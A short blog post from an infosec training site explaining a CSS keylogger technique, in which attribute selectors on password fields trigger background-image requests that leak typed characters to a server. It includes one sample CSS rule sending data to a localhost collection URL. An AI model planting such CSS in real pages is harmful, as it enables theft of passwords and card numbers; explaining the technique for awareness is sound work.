Home 0P3N Blog CSS Hacking: The Surprise of February
Ready to Start Your Career?
Create Free Account
By: Joeri Jungschlager
March 4, 2018

CSS Hacking: The Surprise of February

By: Joeri Jungschlager
March 4, 2018
By: Joeri Jungschlager
March 4, 2018
To some it may have popped up earlier than 2018, for me it was quite new. I walked into the office after a week of teaching children how to code. Since the age group, the choice for HTML & CSS was more than acceptable. But to my surprise I may have got them way closer to writing their first sort of keylogger then I thought. A few of the kids who were accelerating the past 4 days had their first steps within Javascript and Angular. But even without Javascript knowledge, it is possible to log keys. The method is very creative.I am going to show the method which I found on GitHub. Now there are a few things to keep in mind ahead.
  1. It's not system-wide

  2. it is also really specific on what data you can obtain in this method.

  3. It is still dangerous, data like passwords and credit card numbers can be stolen.

This attack is really simple. Utilizing CSS attribute selectors, one can request resources from an external server under the premise of loading a background-image.

For example, the following css will select all input's with a type that equals password and a value that ends with a. It will then try to load an image from http://localhost:3000/a.

The css-code

input[type="password"][value$="a"] {  background-image: url("http://localhost:3000/a");}

Do you like to write about your infosec knowledge, skills, opinions, or exploits?

Blog Icon

Publish your original research, tutorials, articles, or other written content on Cybray's blog to be seen by thousands of infosec readers daily!

Build your Cybersecurity or IT Career

Accelerate in your role, earn new certifications, and develop cutting-edge skills using the fastest growing catalog in the industry